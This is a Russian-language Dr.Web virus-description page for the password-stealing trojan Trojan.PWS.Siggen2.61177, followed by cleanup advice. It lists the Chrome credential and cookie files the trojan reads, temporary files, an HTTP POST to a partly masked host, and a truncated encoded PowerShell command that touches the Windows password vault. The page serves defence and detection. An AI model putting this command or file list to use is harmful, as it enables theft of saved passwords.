Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.PWS.Siggen2.61177

Добавлен в вирусную базу Dr.Web: 2021-01-19

Описание добавлено:

Техническая информация

Вредоносные функции
Читает файлы, отвечающие за хранение паролей сторонними программами
  • %LOCALAPPDATA%\google\chrome\user data\default\cookies
  • %LOCALAPPDATA%\google\chrome\user data\default\login data
  • %LOCALAPPDATA%\google\chrome\user data\default\web data
Изменения в файловой системе
Создает следующие файлы
  • %TEMP%\now_37dcdb73-1bcf-459c-a057-053f78271e76
  • %TEMP%\now_c2f7c03c-676f-4d39-b679-25bfff16c606
  • %TEMP%\now_528bc7bf-605a-4ad2-9ed4-64f32c61b8cd
  • %TEMP%\now_0e494717-8c2f-4eb3-9a42-60bb401d2278
  • %TEMP%\now_b489f27f-abe3-4184-be75-cfdd8bd396c4
  • %TEMP%\now_e932f72e-5283-40ac-8558-a7c6c19e0810
  • %TEMP%\now_76f98b30-19b5-4928-bc5a-87363fb69bb7
  • %TEMP%\now_542bc0a0-2279-4fff-805a-58d2cafbb618
  • %TEMP%\now_d57a290c-470c-4a8e-8fb7-93e47388d1ab
  • %TEMP%\now_e5174cbd-845e-4fec-82a7-48d032783d98
  • %TEMP%\now_c049831e-0ded-4509-9040-67d042660709
  • %TEMP%\now_6ba7fc3e-fa48-482e-930e-8c75b1b390e6
  • %TEMP%\now_5012ae74-a711-4ddb-a3d8-08d6d84bce8b
  • %TEMP%\now_15bd02e3-6f82-4c98-8cd3-d02beed8c831
  • %TEMP%\now_112096a6-25d4-49af-80ba-3ec59aa91775
  • %TEMP%\now_65f98d7e-aad8-4bc5-89d3-49e993a6b33a
  • %TEMP%\now_46bc46fd-3852-4689-91ae-d1ea5b813214
  • %TEMP%\now_466174d5-b527-4d56-9344-289cbcc2d3ac
  • %TEMP%\now_e0514838-85c2-4a18-9075-2fb7484b39b1
  • %TEMP%\now_2798ce4b-8e3f-4828-9f81-704ba6c41f3a
  • %TEMP%\now_09cd6a9e-87b3-413b-8d94-bfaa32b7153e
  • %TEMP%\now_9e19382a-b72f-4de3-b465-0d8c2c150abf
  • %TEMP%\now_72702092-3968-4a6e-be40-ae58b1c3035c
  • %TEMP%\now_52815ffa-4749-45c8-a3dc-272aa161acce
  • %TEMP%\now_e150b978-7bfe-4d52-865e-329e2e66ba8d
  • %TEMP%\now_54214663-f80c-4dfb-a6fe-a9b374054746
  • %TEMP%\now_b82f7e98-cba3-4b28-baa0-86790b331e01
  • %TEMP%\now_9a5f8fcd-2433-48f0-adfd-56abe525a130
  • %TEMP%\now_6ee2f580-d089-456a-b308-33e82994d97f
  • %TEMP%\now_49e7f3e0-b252-4a45-a358-79723c224fdf
  • %TEMP%\now_1ebc03bc-a7c9-47b8-9f1b-d1e686889b7e
  • %TEMP%\now_b9cd3585-4ef9-4def-b4ad-fac7f70532eb
  • %TEMP%\now_88463672-4cc1-42bf-8e3d-714816bf18a8
  • %TEMP%\now_7221b2e0-61d4-4df3-9026-09e6ff1a9024
  • %TEMP%\now_319f8e42-85a9-46de-a454-b7978228751a
  • %TEMP%\now_ef109931-b307-4b41-aaae-d23666318d5a
  • %TEMP%\now_96b33e03-ed96-4b35-8ca1-202b17b07071
  • %TEMP%\now_6b4489c0-d342-430d-8711-6aea65fb7a8b
  • %TEMP%\now_b1309a25-d1eb-4885-be2c-cd37095c9a52
  • %TEMP%\now_9821829a-c388-4b6e-9870-a156bc07d2b6
  • %TEMP%\now_8a4f60da-e750-49c5-8b81-c618582d253e
  • %TEMP%\now_ce37cc85-ec94-4ecb-b915-74165ecc0345
  • %TEMP%\now_0eb6b740-ecd9-41aa-a31a-87f8086f7e04
  • %TEMP%\now_62867d73-b5b8-4e41-9fef-d778fa6e387e
  • %TEMP%\now_72246e83-0ae5-49f5-b643-ff74a231f2a8
  • %TEMP%\now_d98dec45-2306-4996-a856-fc53c6113eb8
  • %TEMP%\now_02f533f4-9adf-4bb1-a771-82d5a31a19a0
  • %TEMP%\now_a0a7dcb3-bd23-4094-bb65-05fdcfcdcca9
  • %TEMP%\now_96c39837-3471-450e-bcaa-4811e8ccb37e
  • %TEMP%\now_84f4639a-dd72-47c0-a5e0-766dbdf932a1
  • %TEMP%\now_a1f89880-0444-4ae9-8656-dda5f67d86f6
  • %TEMP%\now_7b471b40-83bd-43ba-bddd-51e19045905b
  • %TEMP%\now_a9b04546-1cd9-4e00-8b27-10b382f41ea6
  • %TEMP%\now_971faa4d-7fdf-40f2-86bf-8d766f09d671
  • %TEMP%\now_82fd3330-52a8-401d-803e-5abbd76ccc51
  • %TEMP%\now_ab05bc5a-532b-47cf-b999-beda0ed497c5
  • %TEMP%\now_6d2c908e-b3f5-4503-a9c5-0c5c53598f1e
  • %TEMP%\now_e054233c-a9b0-48e9-94e9-28d0dc5f2b6b
  • %TEMP%\now_a8fa9b54-acba-4290-9015-c3c4d7553f31
  • %TEMP%\now_69a7b524-12ac-4963-9953-bc2200ba3417
  • %TEMP%\now_f1c1d9cf-ff61-4bc7-836f-f883015ac877
  • %TEMP%\now_f7b455db-0965-40a2-8ac6-98bb0bbac469
  • %TEMP%\now_9d27eb33-d0a4-4ac0-aaf0-22cf5daa13db
  • %TEMP%\now_2854621b-2e34-45ab-b17e-b092cf0ee016
  • %TEMP%\now_306b627f-5503-434b-a5ce-542c16fe37b0
  • %TEMP%\now_3e993671-6e04-4969-b54d-1c99ca66a413
  • %TEMP%\now_7cdd90d7-bc66-48a0-9c5b-eeb7c8615569
  • %TEMP%\now_8f0f78dc-c68a-463f-8c80-ec7a8d7d53b3
  • %TEMP%\now_775a01ac-909a-41cb-80f6-012364619637
  • %TEMP%\now_3d1e1c71-6613-4210-8381-229b46af8958
  • %TEMP%\now_2772e6d8-e970-4ed9-a030-92725b8e8f0f
  • %TEMP%\now_ac9cb6cd-3985-4a92-8eec-161841de3ddd
  • %TEMP%\now_8738e7b6-932a-4b9d-ab2f-f86e6215edae
  • %TEMP%\now_997740c2-5bc5-44d5-97b5-94f4bf7cb596
  • %TEMP%\now_00b2f6b5-f9c0-4dec-9704-3a2d1f61e97e
  • %TEMP%\now_0379f435-8c50-491f-8cbe-72ffa2336cd0
  • %TEMP%\now_9b0f1b1c-4225-40f5-9063-7dd5de717e2a
  • %TEMP%\now_35ecd4be-fd7a-449b-8881-677979df4f2e
  • %TEMP%\now_25c785ed-3c68-439e-be44-77a9e124ee17
  • %TEMP%\now_137064ca-4c37-4a09-adf2-6b13f3a80043
  • %TEMP%\now_4e858a64-bc28-46a6-8c6b-44c7fcdb7152
  • %TEMP%\now_e0754e51-01c6-4b90-8b00-001be06e26ee
  • %TEMP%\now_bac9b8c9-d8d5-48ad-af41-226443d9e8ec
Удаляет следующие файлы
  • %TEMP%\now_37dcdb73-1bcf-459c-a057-053f78271e76
  • %TEMP%\now_c2f7c03c-676f-4d39-b679-25bfff16c606
  • %TEMP%\now_528bc7bf-605a-4ad2-9ed4-64f32c61b8cd
  • %TEMP%\now_0e494717-8c2f-4eb3-9a42-60bb401d2278
  • %TEMP%\now_b489f27f-abe3-4184-be75-cfdd8bd396c4
  • %TEMP%\now_e932f72e-5283-40ac-8558-a7c6c19e0810
  • %TEMP%\now_76f98b30-19b5-4928-bc5a-87363fb69bb7
  • %TEMP%\now_542bc0a0-2279-4fff-805a-58d2cafbb618
  • %TEMP%\now_d57a290c-470c-4a8e-8fb7-93e47388d1ab
  • %TEMP%\now_e5174cbd-845e-4fec-82a7-48d032783d98
  • %TEMP%\now_c049831e-0ded-4509-9040-67d042660709
  • %TEMP%\now_6ba7fc3e-fa48-482e-930e-8c75b1b390e6
  • %TEMP%\now_5012ae74-a711-4ddb-a3d8-08d6d84bce8b
  • %TEMP%\now_15bd02e3-6f82-4c98-8cd3-d02beed8c831
  • %TEMP%\now_112096a6-25d4-49af-80ba-3ec59aa91775
  • %TEMP%\now_65f98d7e-aad8-4bc5-89d3-49e993a6b33a
  • %TEMP%\now_46bc46fd-3852-4689-91ae-d1ea5b813214
  • %TEMP%\now_466174d5-b527-4d56-9344-289cbcc2d3ac
  • %TEMP%\now_e0514838-85c2-4a18-9075-2fb7484b39b1
  • %TEMP%\now_2798ce4b-8e3f-4828-9f81-704ba6c41f3a
  • %TEMP%\now_09cd6a9e-87b3-413b-8d94-bfaa32b7153e
  • %TEMP%\now_9e19382a-b72f-4de3-b465-0d8c2c150abf
  • %TEMP%\now_72702092-3968-4a6e-be40-ae58b1c3035c
  • %TEMP%\now_52815ffa-4749-45c8-a3dc-272aa161acce
  • %TEMP%\now_e150b978-7bfe-4d52-865e-329e2e66ba8d
  • %TEMP%\now_54214663-f80c-4dfb-a6fe-a9b374054746
  • %TEMP%\now_b82f7e98-cba3-4b28-baa0-86790b331e01
  • %TEMP%\now_9a5f8fcd-2433-48f0-adfd-56abe525a130
  • %TEMP%\now_6ee2f580-d089-456a-b308-33e82994d97f
  • %TEMP%\now_49e7f3e0-b252-4a45-a358-79723c224fdf
  • %TEMP%\now_1ebc03bc-a7c9-47b8-9f1b-d1e686889b7e
  • %TEMP%\now_b9cd3585-4ef9-4def-b4ad-fac7f70532eb
  • %TEMP%\now_88463672-4cc1-42bf-8e3d-714816bf18a8
  • %TEMP%\now_7221b2e0-61d4-4df3-9026-09e6ff1a9024
  • %TEMP%\now_319f8e42-85a9-46de-a454-b7978228751a
  • %TEMP%\now_ef109931-b307-4b41-aaae-d23666318d5a
  • %TEMP%\now_96b33e03-ed96-4b35-8ca1-202b17b07071
  • %TEMP%\now_6b4489c0-d342-430d-8711-6aea65fb7a8b
  • %TEMP%\now_b1309a25-d1eb-4885-be2c-cd37095c9a52
  • %TEMP%\now_9821829a-c388-4b6e-9870-a156bc07d2b6
  • %TEMP%\now_8a4f60da-e750-49c5-8b81-c618582d253e
  • %TEMP%\now_ce37cc85-ec94-4ecb-b915-74165ecc0345
  • %TEMP%\now_0eb6b740-ecd9-41aa-a31a-87f8086f7e04
  • %TEMP%\now_62867d73-b5b8-4e41-9fef-d778fa6e387e
  • %TEMP%\now_72246e83-0ae5-49f5-b643-ff74a231f2a8
  • %TEMP%\now_d98dec45-2306-4996-a856-fc53c6113eb8
  • %TEMP%\now_02f533f4-9adf-4bb1-a771-82d5a31a19a0
  • %TEMP%\now_a0a7dcb3-bd23-4094-bb65-05fdcfcdcca9
  • %TEMP%\now_96c39837-3471-450e-bcaa-4811e8ccb37e
  • %TEMP%\now_84f4639a-dd72-47c0-a5e0-766dbdf932a1
  • %TEMP%\now_a1f89880-0444-4ae9-8656-dda5f67d86f6
  • %TEMP%\now_7b471b40-83bd-43ba-bddd-51e19045905b
  • %TEMP%\now_a9b04546-1cd9-4e00-8b27-10b382f41ea6
  • %TEMP%\now_971faa4d-7fdf-40f2-86bf-8d766f09d671
  • %TEMP%\now_82fd3330-52a8-401d-803e-5abbd76ccc51
  • %TEMP%\now_ab05bc5a-532b-47cf-b999-beda0ed497c5
  • %TEMP%\now_6d2c908e-b3f5-4503-a9c5-0c5c53598f1e
  • %TEMP%\now_e054233c-a9b0-48e9-94e9-28d0dc5f2b6b
  • %TEMP%\now_a8fa9b54-acba-4290-9015-c3c4d7553f31
  • %TEMP%\now_69a7b524-12ac-4963-9953-bc2200ba3417
  • %TEMP%\now_f1c1d9cf-ff61-4bc7-836f-f883015ac877
  • %TEMP%\now_f7b455db-0965-40a2-8ac6-98bb0bbac469
  • %TEMP%\now_9d27eb33-d0a4-4ac0-aaf0-22cf5daa13db
  • %TEMP%\now_2854621b-2e34-45ab-b17e-b092cf0ee016
  • %TEMP%\now_306b627f-5503-434b-a5ce-542c16fe37b0
  • %TEMP%\now_3e993671-6e04-4969-b54d-1c99ca66a413
  • %TEMP%\now_7cdd90d7-bc66-48a0-9c5b-eeb7c8615569
  • %TEMP%\now_8f0f78dc-c68a-463f-8c80-ec7a8d7d53b3
  • %TEMP%\now_775a01ac-909a-41cb-80f6-012364619637
  • %TEMP%\now_3d1e1c71-6613-4210-8381-229b46af8958
  • %TEMP%\now_2772e6d8-e970-4ed9-a030-92725b8e8f0f
  • %TEMP%\now_ac9cb6cd-3985-4a92-8eec-161841de3ddd
  • %TEMP%\now_8738e7b6-932a-4b9d-ab2f-f86e6215edae
  • %TEMP%\now_997740c2-5bc5-44d5-97b5-94f4bf7cb596
  • %TEMP%\now_00b2f6b5-f9c0-4dec-9704-3a2d1f61e97e
  • %TEMP%\now_0379f435-8c50-491f-8cbe-72ffa2336cd0
  • %TEMP%\now_9b0f1b1c-4225-40f5-9063-7dd5de717e2a
  • %TEMP%\now_35ecd4be-fd7a-449b-8881-677979df4f2e
  • %TEMP%\now_25c785ed-3c68-439e-be44-77a9e124ee17
  • %TEMP%\now_137064ca-4c37-4a09-adf2-6b13f3a80043
  • %TEMP%\now_4e858a64-bc28-46a6-8c6b-44c7fcdb7152
  • %TEMP%\now_e0754e51-01c6-4b90-8b00-001be06e26ee
  • %TEMP%\now_bac9b8c9-d8d5-48ad-af41-226443d9e8ec
Сетевая активность
Подключается к
  • 'sc###tos.store':80
TCP
Запросы HTTP POST
  • http://sc###tos.store/
UDP
  • DNS ASK sc###tos.store
Другое
Запускает на исполнение
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy unrestricted -EncodedCommand WwB2AG8AaQBkAF0AWwBXAGkAbgBkAG8AdwBzAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAC4AUABhAHMAcwB3AG8AcgBkAFYAYQB1AGwAdAAsAFcA...

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке